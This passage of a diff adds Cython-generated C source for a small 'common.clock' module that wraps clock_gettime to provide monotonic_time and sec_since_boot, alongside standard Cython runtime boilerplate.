*func_doc; + PyObject *func_globals; + PyObject *func_code; + PyObject *func_closure; +#if PY_VERSION_HEX < 0x030900B1 + PyObject *func_classobj; +#endif + void *defaults; + int defaults_pyobjects; + size_t defaults_size; // used by FusedFunction for copying defaults + int flags; + PyObject *defaults_tuple; + PyObject *defaults_kwdict; + PyObject *(*defaults_getter)(PyObject *); + PyObject *func_annotations; + PyObject *func_is_coroutine; +} __pyx_CyFunctionObject; +#define __Pyx_CyFunction_Check(obj) __Pyx_TypeCheck(obj, __pyx_CyFunctionType) +#define __Pyx_IsCyOrPyCFunction(obj) __Pyx_TypeCheck2(obj, __pyx_CyFunctionType, &PyCFunction_Type) +#define __Pyx_CyFunction_CheckExact(obj) __Pyx_IS_TYPE(obj, __pyx_CyFunctionType) +static PyObject *__Pyx_CyFunction_Init(__pyx_CyFunctionObject* op, PyMethodDef *ml, + int flags, PyObject* qualname, + PyObject *closure, + PyObject *module, PyObject *globals, + PyObject* code); +static CYTHON_INLINE void __Pyx__CyFunction_SetClassObj(__pyx_CyFunctionObject* f, PyObject* classobj); +static CYTHON_INLINE void *__Pyx_CyFunction_InitDefaults(PyObject *m, + size_t size, + int pyobjects); +static CYTHON_INLINE void __Pyx_CyFunction_SetDefaultsTuple(PyObject *m, + PyObject *tuple); +static CYTHON_INLINE void __Pyx_CyFunction_SetDefaultsKwDict(PyObject *m, + PyObject *dict); +static CYTHON_INLINE void __Pyx_CyFunction_SetAnnotationsDict(PyObject *m, + PyObject *dict); +static int __pyx_CyFunction_init(PyObject *module); +#if CYTHON_METH_FASTCALL +static PyObject * __Pyx_CyFunction_Vectorcall_NOARGS(PyObject *func, PyObject *const *args, size_t nargsf, PyObject *kwnames); +static PyObject * __Pyx_CyFunction_Vectorcall_O(PyObject *func, PyObject *const *args, size_t nargsf, PyObject *kwnames); +static PyObject * __Pyx_CyFunction_Vectorcall_FASTCALL_KEYWORDS(PyObject *func, PyObject *const *args, size_t nargsf, PyObject *kwnames); +static PyObject * __Pyx_CyFunction_Vectorcall_FASTCALL_KEYWORDS_METHOD(PyObject *func, PyObject *const *args, size_t nargsf, PyObject *kwnames); +#if CYTHON_BACKPORT_VECTORCALL +#define __Pyx_CyFunction_func_vectorcall(f) (((__pyx_CyFunctionObject*)f)->func_vectorcall) +#else +#define __Pyx_CyFunction_func_vectorcall(f) (((PyCFunctionObject*)f)->vectorcall) +#endif +#endif + +/* CythonFunction.proto */ +static PyObject *__Pyx_CyFunction_New(PyMethodDef *ml, + int flags, PyObject* qualname, + PyObject *closure, + PyObject *module, PyObject *globals, + PyObject* code); + +/* PyDictVersioning.proto */ +#if CYTHON_USE_DICT_VERSIONS && CYTHON_USE_TYPE_SLOTS +#define __PYX_DICT_VERSION_INIT ((PY_UINT64_T) -1) +#define __PYX_GET_DICT_VERSION(dict) (((PyDictObject*)(dict))->ma_version_tag) +#define __PYX_UPDATE_DICT_CACHE(dict, value, cache_var, version_var)\ + (version_var) = __PYX_GET_DICT_VERSION(dict);\ + (cache_var) = (value); +#define __PYX_PY_DICT_LOOKUP_IF_MODIFIED(VAR, DICT, LOOKUP) {\ + static PY_UINT64_T __pyx_dict_version = 0;\ + static PyObject *__pyx_dict_cached_value = NULL;\ + if (likely(__PYX_GET_DICT_VERSION(DICT) == __pyx_dict_version)) {\ + (VAR) = __pyx_dict_cached_value;\ + } else {\ + (VAR) = __pyx_dict_cached_value = (LOOKUP);\ + __pyx_dict_version = __PYX_GET_DICT_VERSION(DICT);\ + }\ +} +static CYTHON_INLINE PY_UINT64_T __Pyx_get_tp_dict_version(PyObject *obj); +static CYTHON_INLINE PY_UINT64_T __Pyx_get_object_dict_version(PyObject *obj); +static CYTHON_INLINE int __Pyx_object_dict_version_matches(PyObject* obj, PY_UINT64_T tp_dict_version, PY_UINT64_T obj_dict_version); +#else +#define __PYX_GET_DICT_VERSION(dict) (0) +#define __PYX_UPDATE_DICT_CACHE(dict, value, cache_var, version_var) +#define __PYX_PY_DICT_LOOKUP_IF_MODIFIED(VAR, DICT, LOOKUP) (VAR) = (LOOKUP); +#endif + +/* PyErrExceptionMatches.proto */ +#if CYTHON_FAST_THREAD_STATE +#define __Pyx_PyErr_ExceptionMatches(err) __Pyx_PyErr_ExceptionMatchesInState(__pyx_tstate, err) +static CYTHON_INLINE int __Pyx_PyErr_ExceptionMatchesInState(PyThreadState* tstate, PyObject* err); +#else +#define __Pyx_PyErr_ExceptionMatches(err) PyErr_ExceptionMatches(err) +#endif + +/* PyThreadStateGet.proto */ +#if CYTHON_FAST_THREAD_STATE +#define __Pyx_PyThreadState_declare PyThreadState *__pyx_tstate; +#define __Pyx_PyThreadState_assign __pyx_tstate = __Pyx_PyThreadState_Current; +#if PY_VERSION_HEX >= 0x030C00A6 +#define __Pyx_PyErr_Occurred() (__pyx_tstate->current_exception != NULL) +#define __Pyx_PyErr_CurrentExceptionType() (__pyx_tstate->current_exception ? (PyObject*) Py_TYPE(__pyx_tstate->current_exception) : (PyObject*) NULL) +#else +#define __Pyx_PyErr_Occurred() (__pyx_tstate->curexc_type != NULL) +#define __Pyx_PyErr_CurrentExceptionType() (__pyx_tstate->curexc_type) +#endif +#else +#define __Pyx_PyThreadState_declare +#define __Pyx_PyThreadState_assign +#define __Pyx_PyErr_Occurred() (PyErr_Occurred() != NULL) +#define __Pyx_PyErr_CurrentExceptionType() PyErr_Occurred() +#endif + +/* PyErrFetchRestore.proto */ +#if CYTHON_FAST_THREAD_STATE +#define __Pyx_PyErr_Clear() __Pyx_ErrRestore(NULL, NULL, NULL) +#define __Pyx_ErrRestoreWithState(type, value, tb) __Pyx_ErrRestoreInState(PyThreadState_GET(), type, value, tb) +#define __Pyx_ErrFetchWithState(type, value, tb) __Pyx_ErrFetchInState(PyThreadState_GET(), type, value, tb) +#define __Pyx_ErrRestore(type, value, tb) __Pyx_ErrRestoreInState(__pyx_tstate, type, value, tb) +#define __Pyx_ErrFetch(type, value, tb) __Pyx_ErrFetchInState(__pyx_tstate, type, value, tb) +static CYTHON_INLINE void __Pyx_ErrRestoreInState(PyThreadState *tstate, PyObject *type, PyObject *value, PyObject *tb); +static CYTHON_INLINE void __Pyx_ErrFetchInState(PyThreadState *tstate, PyObject **type, PyObject **value, PyObject **tb); +#if CYTHON_COMPILING_IN_CPYTHON && PY_VERSION_HEX < 0x030C00A6 +#define __Pyx_PyErr_SetNone(exc) (Py_INCREF(exc), __Pyx_ErrRestore((exc), NULL, NULL)) +#else +#define __Pyx_PyErr_SetNone(exc) PyErr_SetNone(exc) +#endif +#else +#define __Pyx_PyErr_Clear() PyErr_Clear() +#define __Pyx_PyErr_SetNone(exc) PyErr_SetNone(exc) +#define __Pyx_ErrRestoreWithState(type, value, tb) PyErr_Restore(type, value, tb) +#define __Pyx_ErrFetchWithState(type, value, tb) PyErr_Fetch(type, value, tb) +#define __Pyx_ErrRestoreInState(tstate, type, value, tb) PyErr_Restore(type, value, tb) +#define __Pyx_ErrFetchInState(tstate, type, value, tb) PyErr_Fetch(type, value, tb) +#define __Pyx_ErrRestore(type, value, tb) PyErr_Restore(type, value, tb) +#define __Pyx_ErrFetch(type, value, tb) PyErr_Fetch(type, value, tb) +#endif + +/* PyObjectGetAttrStrNoError.proto */ +static CYTHON_INLINE PyObject* __Pyx_PyObject_GetAttrStrNoError(PyObject* obj, PyObject* attr_name); + +/* CLineInTraceback.proto */ +#ifdef CYTHON_CLINE_IN_TRACEBACK +#define __Pyx_CLineForTraceback(tstate, c_line) (((CYTHON_CLINE_IN_TRACEBACK)) ? c_line : 0) +#else +static int __Pyx_CLineForTraceback(PyThreadState *tstate, int c_line); +#endif + +/* CodeObjectCache.proto */ +#if !CYTHON_COMPILING_IN_LIMITED_API +typedef struct { + PyCodeObject* code_object; + int code_line; +} __Pyx_CodeObjectCacheEntry; +struct __Pyx_CodeObjectCache { + int count; + int max_count; + __Pyx_CodeObjectCacheEntry* entries; +}; +static struct __Pyx_CodeObjectCache __pyx_code_cache = {0,0,NULL}; +static int __pyx_bisect_code_objects(__Pyx_CodeObjectCacheEntry* entries, int count, int code_line); +static PyCodeObject *__pyx_find_code_object(int code_line); +static void __pyx_insert_code_object(int code_line, PyCodeObject* code_object); +#endif + +/* AddTraceback.proto */ +static void __Pyx_AddTraceback(const char *funcname, int c_line, + int py_line, const char *filename); + +/* FormatTypeName.proto */ +#if CYTHON_COMPILING_IN_LIMITED_API +typedef PyObject *__Pyx_TypeName; +#define __Pyx_FMT_TYPENAME "%U" +static __Pyx_TypeName __Pyx_PyType_GetName(PyTypeObject* tp); +#define __Pyx_DECREF_TypeName(obj) Py_XDECREF(obj) +#else +typedef const char *__Pyx_TypeName; +#define __Pyx_FMT_TYPENAME "%.200s" +#define __Pyx_PyType_GetName(tp) ((tp)->tp_name) +#define __Pyx_DECREF_TypeName(obj) +#endif + +/* GCCDiagnostics.proto */ +#if !defined(__INTEL_COMPILER) && defined(__GNUC__) && (__GNUC__ > 4 || (__GNUC__ == 4 && __GNUC_MINOR__ >= 6)) +#define __Pyx_HAS_GCC_DIAGNOSTIC +#endif + +/* CIntToPy.proto */ +static CYTHON_INLINE PyObject* __Pyx_PyInt_From_long(long value); + +/* CIntFromPy.proto */ +static CYTHON_INLINE long __Pyx_PyInt_As_long(PyObject *); + +/* CIntFromPy.proto */ +static CYTHON_INLINE int __Pyx_PyInt_As_int(PyObject *); + +/* FastTypeChecks.proto */ +#if CYTHON_COMPILING_IN_CPYTHON +#define __Pyx_TypeCheck(obj, type) __Pyx_IsSubtype(Py_TYPE(obj), (PyTypeObject *)type) +#define __Pyx_TypeCheck2(obj, type1, type2) __Pyx_IsAnySubtype2(Py_TYPE(obj), (PyTypeObject *)type1, (PyTypeObject *)type2) +static CYTHON_INLINE int __Pyx_IsSubtype(PyTypeObject *a, PyTypeObject *b); +static CYTHON_INLINE int __Pyx_IsAnySubtype2(PyTypeObject *cls, PyTypeObject *a, PyTypeObject *b); +static CYTHON_INLINE int __Pyx_PyErr_GivenExceptionMatches(PyObject *err, PyObject *type); +static CYTHON_INLINE int __Pyx_PyErr_GivenExceptionMatches2(PyObject *err, PyObject *type1, PyObject *type2); +#else +#define __Pyx_TypeCheck(obj, type) PyObject_TypeCheck(obj, (PyTypeObject *)type) +#define __Pyx_TypeCheck2(obj, type1, type2) (PyObject_TypeCheck(obj, (PyTypeObject *)type1) || PyObject_TypeCheck(obj, (PyTypeObject *)type2)) +#define __Pyx_PyErr_GivenExceptionMatches(err, type) PyErr_GivenExceptionMatches(err, type) +#define __Pyx_PyErr_GivenExceptionMatches2(err, type1, type2) (PyErr_GivenExceptionMatches(err, type1) || PyErr_GivenExceptionMatches(err, type2)) +#endif +#define __Pyx_PyErr_ExceptionMatches2(err1, err2) __Pyx_PyErr_GivenExceptionMatches2(__Pyx_PyErr_CurrentExceptionType(), err1, err2) +#define __Pyx_PyException_Check(obj) __Pyx_TypeCheck(obj, PyExc_Exception) + +/* CheckBinaryVersion.proto */ +static int __Pyx_check_binary_version(void); + +/* InitStrings.proto */ +static int __Pyx_InitStrings(__Pyx_StringTabEntry *t); + +/* #### Code section: module_declarations ### */ + +/* Module declarations from "posix.types" */ + +/* Module declarations from "posix.signal" */ + +/* Module declarations from "posix.time" */ + +/* Module declarations from "common.clock" */ +static double __pyx_f_6common_5clock_readclock(clockid_t); /*proto*/ +/* #### Code section: typeinfo ### */ +/* #### Code section: before_global_var ### */ +#define __Pyx_MODULE_NAME "common.clock" +extern int __pyx_module_is_main_common__clock; +int __pyx_module_is_main_common__clock = 0; + +/* Implementation of "common.clock" */ +/* #### Code section: global_var ### */ +/* #### Code section: string_decls ### */ +static const char __pyx_k__3[] = "?"; +static const char __pyx_k_main[] = "__main__"; +static const char __pyx_k_name[] = "__name__"; +static const char __pyx_k_test[] = "__test__"; +static const char __pyx_k_common_clock[] = "common.clock"; +static const char __pyx_k_is_coroutine[] = "_is_coroutine"; +static const char __pyx_k_monotonic_time[] = "monotonic_time"; +static const char __pyx_k_sec_since_boot[] = "sec_since_boot"; +static const char __pyx_k_common_clock_pyx[] = "common/clock.pyx"; +static const char __pyx_k_asyncio_coroutines[] = "asyncio.coroutines"; +static const char __pyx_k_cline_in_traceback[] = "cline_in_traceback"; +/* #### Code section: decls ### */ +static PyObject *__pyx_pf_6common_5clock_monotonic_time(CYTHON_UNUSED PyObject *__pyx_self); /* proto */ +static PyObject *__pyx_pf_6common_5clock_2sec_since_boot(CYTHON_UNUSED PyObject *__pyx_self); /* proto */ +/* #### Code section: late_includes ### */ +/* #### Code section: module_state ### */ +typedef struct { + PyObject *__pyx_d; + PyObject *__pyx_b; + PyObject *__pyx_cython_runtime; + PyObject *__pyx_empty_tuple; + PyObject *__pyx_empty_bytes; + PyObject *__pyx_empty_unicode; + #ifdef __Pyx_CyFunction_USED + PyTypeObject *__pyx_CyFunctionType; + #endif + #ifdef __Pyx_FusedFunction_USED + PyTypeObject *__pyx_FusedFunctionType; + #endif + #ifdef __Pyx_Generator_USED + PyTypeObject *__pyx_GeneratorType; + #endif + #ifdef __Pyx_IterableCoroutine_USED + PyTypeObject *__pyx_IterableCoroutineType; + #endif + #ifdef __Pyx_Coroutine_USED + PyTypeObject *__pyx_CoroutineAwaitType; + #endif + #ifdef __Pyx_Coroutine_USED + PyTypeObject *__pyx_CoroutineType; + #endif + #if CYTHON_USE_MODULE_STATE + #endif + #if CYTHON_USE_MODULE_STATE + #endif + #if CYTHON_USE_MODULE_STATE + #endif + #if CYTHON_USE_MODULE_STATE + #endif + PyObject *__pyx_n_s__3; + PyObject *__pyx_n_s_asyncio_coroutines; + PyObject *__pyx_n_s_cline_in_traceback; + PyObject *__pyx_n_s_common_clock; + PyObject *__pyx_kp_s_common_clock_pyx; + PyObject *__pyx_n_s_is_coroutine; + PyObject *__pyx_n_s_main; + PyObject *__pyx_n_s_monotonic_time; + PyObject *__pyx_n_s_name; + PyObject *__pyx_n_s_sec_since_boot; + PyObject *__pyx_n_s_test; + PyObject *__pyx_codeobj_; + PyObject *__pyx_codeobj__2; +} __pyx_mstate; + +#if CYTHON_USE_MODULE_STATE +#ifdef __cplusplus +namespace { + extern struct PyModuleDef __pyx_moduledef; +} /* anonymous namespace */ +#else +static struct PyModuleDef __pyx_moduledef; +#endif + +#define __pyx_mstate(o) ((__pyx_mstate *)__Pyx_PyModule_GetState(o)) + +#define __pyx_mstate_global (__pyx_mstate(PyState_FindModule(&__pyx_moduledef))) + +#define __pyx_m (PyState_FindModule(&__pyx_moduledef)) +#else +static __pyx_mstate __pyx_mstate_global_static = +#ifdef __cplusplus + {}; +#else + {0}; +#endif +static __pyx_mstate *__pyx_mstate_global = &__pyx_mstate_global_static; +#endif +/* #### Code section: module_state_clear ### */ +#if CYTHON_USE_MODULE_STATE +static int __pyx_m_clear(PyObject *m) { + __pyx_mstate *clear_module_state = __pyx_mstate(m); + if (!clear_module_state) return 0; + Py_CLEAR(clear_module_state->__pyx_d); + Py_CLEAR(clear_module_state->__pyx_b); + Py_CLEAR(clear_module_state->__pyx_cython_runtime); + Py_CLEAR(clear_module_state->__pyx_empty_tuple); + Py_CLEAR(clear_module_state->__pyx_empty_bytes); + Py_CLEAR(clear_module_state->__pyx_empty_unicode); + #ifdef __Pyx_CyFunction_USED + Py_CLEAR(clear_module_state->__pyx_CyFunctionType); + #endif + #ifdef __Pyx_FusedFunction_USED + Py_CLEAR(clear_module_state->__pyx_FusedFunctionType); + #endif + Py_CLEAR(clear_module_state->__pyx_n_s__3); + Py_CLEAR(clear_module_state->__pyx_n_s_asyncio_coroutines); + Py_CLEAR(clear_module_state->__pyx_n_s_cline_in_traceback); + Py_CLEAR(clear_module_state->__pyx_n_s_common_clock); + Py_CLEAR(clear_module_state->__pyx_kp_s_common_clock_pyx); + Py_CLEAR(clear_module_state->__pyx_n_s_is_coroutine); + Py_CLEAR(clear_module_state->__pyx_n_s_main); + Py_CLEAR(clear_module_state->__pyx_n_s_monotonic_time); + Py_CLEAR(clear_module_state->__pyx_n_s_name); + Py_CLEAR(clear_module_state->__pyx_n_s_sec_since_boot); + Py_CLEAR(clear_module_state->__pyx_n_s_test); + Py_CLEAR(clear_module_state->__pyx_codeobj_); + Py_CLEAR(clear_module_state->__pyx_codeobj__2); + return 0; +} +#endif +/* #### Code section: module_state_traverse ### */ +#if CYTHON_USE_MODULE_STATE +static int __pyx_m_traverse(PyObject *m, visitproc visit, void *arg) { + __pyx_mstate *traverse_module_state = __pyx_mstate(m); + if (!traverse_module_state) return 0; + Py_VISIT(traverse_module_state->__pyx_d); + Py_VISIT(traverse_module_state->__pyx_b); + Py_VISIT(traverse_module_state->__pyx_cython_runtime); + Py_VISIT(traverse_module_state->__pyx_empty_tuple); + Py_VISIT(traverse_module_state->__pyx_empty_bytes); + Py_VISIT(traverse_module_state->__pyx_empty_unicode); + #ifdef __Pyx_CyFunction_USED + Py_VISIT(traverse_module_state->__pyx_CyFunctionType); + #endif + #ifdef __Pyx_FusedFunction_USED + Py_VISIT(traverse_module_state->__pyx_FusedFunctionType); + #endif + Py_VISIT(traverse_module_state->__pyx_n_s__3); + Py_VISIT(traverse_module_state->__pyx_n_s_asyncio_coroutines); + Py_VISIT(traverse_module_state->__pyx_n_s_cline_in_traceback); + Py_VISIT(traverse_module_state->__pyx_n_s_common_clock); + Py_VISIT(traverse_module_state->__pyx_kp_s_common_clock_pyx); + Py_VISIT(traverse_module_state->__pyx_n_s_is_coroutine); + Py_VISIT(traverse_module_state->__pyx_n_s_main); + Py_VISIT(traverse_module_state->__pyx_n_s_monotonic_time); + Py_VISIT(traverse_module_state->__pyx_n_s_name); + Py_VISIT(traverse_module_state->__pyx_n_s_sec_since_boot); + Py_VISIT(traverse_module_state->__pyx_n_s_test); + Py_VISIT(traverse_module_state->__pyx_codeobj_); + Py_VISIT(traverse_module_state->__pyx_codeobj__2); + return 0; +} +#endif +/* #### Code section: module_state_defines ### */ +#define __pyx_d __pyx_mstate_global->__pyx_d +#define __pyx_b __pyx_mstate_global->__pyx_b +#define __pyx_cython_runtime __pyx_mstate_global->__pyx_cython_runtime +#define __pyx_empty_tuple __pyx_mstate_global->__pyx_empty_tuple +#define __pyx_empty_bytes __pyx_mstate_global->__pyx_empty_bytes +#define __pyx_empty_unicode __pyx_mstate_global->__pyx_empty_unicode +#ifdef __Pyx_CyFunction_USED +#define __pyx_CyFunctionType __pyx_mstate_global->__pyx_CyFunctionType +#endif +#ifdef __Pyx_FusedFunction_USED +#define __pyx_FusedFunctionType __pyx_mstate_global->__pyx_FusedFunctionType +#endif +#ifdef __Pyx_Generator_USED +#define __pyx_GeneratorType __pyx_mstate_global->__pyx_GeneratorType +#endif +#ifdef __Pyx_IterableCoroutine_USED +#define __pyx_IterableCoroutineType __pyx_mstate_global->__pyx_IterableCoroutineType +#endif +#ifdef __Pyx_Coroutine_USED +#define __pyx_CoroutineAwaitType __pyx_mstate_global->__pyx_CoroutineAwaitType +#endif +#ifdef __Pyx_Coroutine_USED +#define __pyx_CoroutineType __pyx_mstate_global->__pyx_CoroutineType +#endif +#if CYTHON_USE_MODULE_STATE +#endif +#if CYTHON_USE_MODULE_STATE +#endif +#if CYTHON_USE_MODULE_STATE +#endif +#if CYTHON_USE_MODULE_STATE +#endif +#define __pyx_n_s__3 __pyx_mstate_global->__pyx_n_s__3 +#define __pyx_n_s_asyncio_coroutines __pyx_mstate_global->__pyx_n_s_asyncio_coroutines +#define __pyx_n_s_cline_in_traceback __pyx_mstate_global->__pyx_n_s_cline_in_traceback +#define __pyx_n_s_common_clock __pyx_mstate_global->__pyx_n_s_common_clock +#define __pyx_kp_s_common_clock_pyx __pyx_mstate_global->__pyx_kp_s_common_clock_pyx +#define __pyx_n_s_is_coroutine __pyx_mstate_global->__pyx_n_s_is_coroutine +#define __pyx_n_s_main __pyx_mstate_global->__pyx_n_s_main +#define __pyx_n_s_monotonic_time __pyx_mstate_global->__pyx_n_s_monotonic_time +#define __pyx_n_s_name __pyx_mstate_global->__pyx_n_s_name +#define __pyx_n_s_sec_since_boot __pyx_mstate_global->__pyx_n_s_sec_since_boot +#define __pyx_n_s_test __pyx_mstate_global->__pyx_n_s_test +#define __pyx_codeobj_ __pyx_mstate_global->__pyx_codeobj_ +#define __pyx_codeobj__2 __pyx_mstate_global->__pyx_codeobj__2 +/* #### Code section: module_code ### */ + +/* "common/clock.pyx":11 + * from posix.time cimport CLOCK_BOOTTIME + * + * cdef double readclock(clockid_t clock_id): # <<<<<<<<<<<<<< + * cdef timespec ts + * cdef double current + */ + +static double __pyx_f_6common_5clock_readclock(clockid_t __pyx_v_clock_id) { + struct timespec __pyx_v_ts; + double __pyx_v_current; + double __pyx_r; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("readclock", 0); + + /* "common/clock.pyx":15 + * cdef double current + * + * clock_gettime(clock_id, &ts) # <<<<<<<<<<<<<< + * current = ts.tv_sec + (ts.tv_nsec / 1000000000.) + * return current + */ + (void)(clock_gettime(__pyx_v_clock_id, (&__pyx_v_ts))); + + /* "common/clock.pyx":16 + * + * clock_gettime(clock_id, &ts) + * current = ts.tv_sec + (ts.tv_nsec / 1000000000.) # <<<<<<<<<<<<<< + * return current + * + */ + __pyx_v_current = (__pyx_v_ts.tv_sec + (((double)__pyx_v_ts.tv_nsec) / 1000000000.)); + + /* "common/clock.pyx":17 + * clock_gettime(clock_id, &ts) + * current = ts.tv_sec + (ts.tv_nsec / 1000000000.) + * return current # <<<<<<<<<<<<<< + * + * def monotonic_time(): + */ + __pyx_r = __pyx_v_current; + goto __pyx_L0; + + /* "common/clock.pyx":11 + * from posix.time cimport CLOCK_BOOTTIME + * + * cdef double readclock(clockid_t clock_id): # <<<<<<<<<<<<<< + * cdef timespec ts + * cdef double current + */ + + /* function exit code */ + __pyx_L0:; + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "common/clock.pyx":19 + * return current + * + * def monotonic_time(): # <<<<<<<<<<<<<< + * return readclock(CLOCK_MONOTONIC_RAW) + * + */ + +/* Python wrapper */ +static PyObject *__pyx_pw_6common_5clock_1monotonic_time(PyObject *__pyx_self, CYTHON_UNUSED PyObject *unused); /*proto*/ +static PyMethodDef __pyx_mdef_6common_5clock_1monotonic_time = {"monotonic_time", (PyCFunction)__pyx_pw_6common_5clock_1monotonic_time, METH_NOARGS, 0}; +static PyObject *__pyx_pw_6common_5clock_1monotonic_time(PyObject *__pyx_self, CYTHON_UNUSED PyObject *unused) { + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_VARARGS(__pyx_args, __pyx_nargs); + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("monotonic_time (wrapper)", 0); + __pyx_r = __pyx_pf_6common_5clock_monotonic_time(__pyx_self); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_pf_6common_5clock_monotonic_time(CYTHON_UNUSED PyObject *__pyx_self) { + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + double __pyx_t_1; + PyObject *__pyx_t_2 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("monotonic_time", 0); + + /* "common/clock.pyx":20 + * + * def monotonic_time(): + * return readclock(CLOCK_MONOTONIC_RAW) # <<<<<<<<<<<<<< + * + * def sec_since_boot(): + */ + __Pyx_XDECREF(__pyx_r); + __pyx_t_1 = __pyx_f_6common_5clock_readclock(CLOCK_MONOTONIC_RAW); if (unlikely(__pyx_t_1 == ((double)-1) && PyErr_Occurred())) __PYX_ERR(0, 20, __pyx_L1_error) + __pyx_t_2 = PyFloat_FromDouble(__pyx_t_1); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 20, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __pyx_r = __pyx_t_2; + __pyx_t_2 = 0; + goto __pyx_L0; + + /* "common/clock.pyx":19 + * return current + * + * def monotonic_time(): # <<<<<<<<<<<<<< + * return readclock(CLOCK_MONOTONIC_RAW) + * + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_2); + __Pyx_AddTraceback("common.clock.monotonic_time", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __pyx_L0:; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "common/clock.pyx":22 + * return readclock(CLOCK_MONOTONIC_RAW) + * + * def sec_since_boot(): # <<<<<<<<<<<<<< + * return readclock(CLOCK_BOOTTIME) + * + */ + +/* Python wrapper */ +static PyObject *__pyx_pw_6common_5clock_3sec_since_boot(PyObject *__pyx_self, CYTHON_UNUSED PyObject *unused); /*proto*/ +static PyMethodDef __pyx_mdef_6common_5clock_3sec_since_boot = {"sec_since_boot", (PyCFunction)__pyx_pw_6common_5clock_3sec_since_boot, METH_NOARGS, 0}; +static PyObject *__pyx_pw_6common_5clock_3sec_since_boot(PyObject *__pyx_self, CYTHON_UNUSED PyObject *unused) { + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_VARARGS(__pyx_args, __pyx_nargs); + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("sec_since_boot (wrapper)", 0); + __pyx_r = __pyx_pf_6common_5clock_2sec_since_boot(__pyx_self); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_pf_6common_5clock_2sec_since_boot(CYTHON_UNUSED PyObject *__pyx_self) { + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + double __pyx_t_1; + PyObject *__pyx_t_2 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("sec_since_boot", 0); + + /* "common/clock.pyx":23 + * + * def sec_since_boot(): + * return readclock(CLOCK_BOOTTIME) # <<<<<<<<<<<<<< + * + */ + __Pyx_XDECREF(__pyx_r); + __pyx_t_1 = __pyx_f_6common_5clock_readclock(CLOCK_BOOTTIME); if (unlikely(__pyx_t_1 == ((double)-1) && PyErr_Occurred())) __PYX_ERR(0, 23, __pyx_L1_error) + __pyx_t_2 = PyFloat_FromDouble(__pyx_t_1); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 23, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __pyx_r = __pyx_t_2; + __pyx_t_2 = 0; + goto __pyx_L0; + + /* "common/clock.pyx":22 + * return readclock(CLOCK_MONOTONIC_RAW) + * + * def sec_since_boot(): # <<<<<<<<<<<<<< + * return readclock(CLOCK_BOOTTIME) + * + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_2); + __Pyx_AddTraceback("common.clock.sec_since_boot", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __pyx_L0:; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyMethodDef __pyx_methods[] = { + {0, 0, 0, 0} +}; +#ifndef CYTHON_SMALL_CODE +#if defined(__clang__) + #define CYTHON_SMALL_CODE +#elif defined(__GNUC__) && (__GNUC__ > 4 || (__GNUC__ == 4 && __GNUC_MINOR__ >= 3)) + #define CYTHON_SMALL_CODE __attribute__((cold)) +#else + #define CYTHON_SMALL_CODE +#endif +#endif +/* #### Code section: pystring_table ### */ + +static int __Pyx_CreateStringTabAndInitStrings(void) { + __Pyx_StringTabEntry __pyx_string_tab[] = { + {&__pyx_n_s__3, __pyx_k__3, sizeof(__pyx_k__3), 0, 0, 1, 1}, + {&__pyx_n_s_asyncio_coroutines, __pyx_k_asyncio_coroutines, sizeof(__pyx_k_asyncio_coroutines), 0, 0, 1, 1}, + {&__pyx_n_s_cline_in_traceback, __pyx_k_cline_in_traceback, sizeof(__pyx_k_cline_in_traceback), 0, 0, 1, 1}, + {&__pyx_n_s_common_clock, __pyx_k_common_clock, sizeof(__pyx_k_common_clock), 0, 0, 1, 1}, + {&__pyx_kp_s_common_clock_pyx, __pyx_k_common_clock_pyx, sizeof(__pyx_k_common_clock_pyx), 0, 0, 1, 0}, + {&__pyx_n_s_is_coroutine, __pyx_k_is_coroutine, sizeof(__pyx_k_is_coroutine), 0, 0, 1, 1}, + {&__pyx_n_s_main, __pyx_k_main, sizeof(__pyx_k_main), 0, 0, 1, 1}, + {&__pyx_n_s_monotonic_time, __pyx_k_monotonic_time, sizeof(__pyx_k_monotonic_time), 0, 0, 1, 1}, + {&__pyx_n_s_name, __pyx_k_name, sizeof(__pyx_k_name), 0, 0, 1, 1}, + {&__pyx_n_s_sec_since_boot, __pyx_k_sec_since_boot, sizeof(__pyx_k_sec_since_boot), 0, 0, 1, 1}, + {&__pyx_n_s_test, __pyx_k_test, sizeof(__pyx_k_test), 0, 0, 1, 1}, + {0, 0, 0, 0, 0, 0, 0} + }; + return __Pyx_InitStrings(__pyx_string_tab); +} +/* #### Code section: cached_builtins ### */ +static CYTHON_SMALL_CODE int __Pyx_InitCachedBuiltins(void) { + return 0; +} +/* #### Code section: cached_constants ### */ + +static CYTHON_SMALL_CODE int __Pyx_InitCachedConstants(void) { + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__Pyx_InitCachedConstants", 0); + + /* "common/clock.pyx":19 + * return current + * + * def monotonic_time(): # <<<<<<<<<<<<<< + * return readclock(CLOCK_MONOTONIC_RAW) + * + */ + __pyx_codeobj_ = (PyObject*)__Pyx_PyCode_New(0, 0, 0, 0, 0, CO_OPTIMIZED|CO_NEWLOCALS, __pyx_empty_bytes, __pyx_empty_tuple, 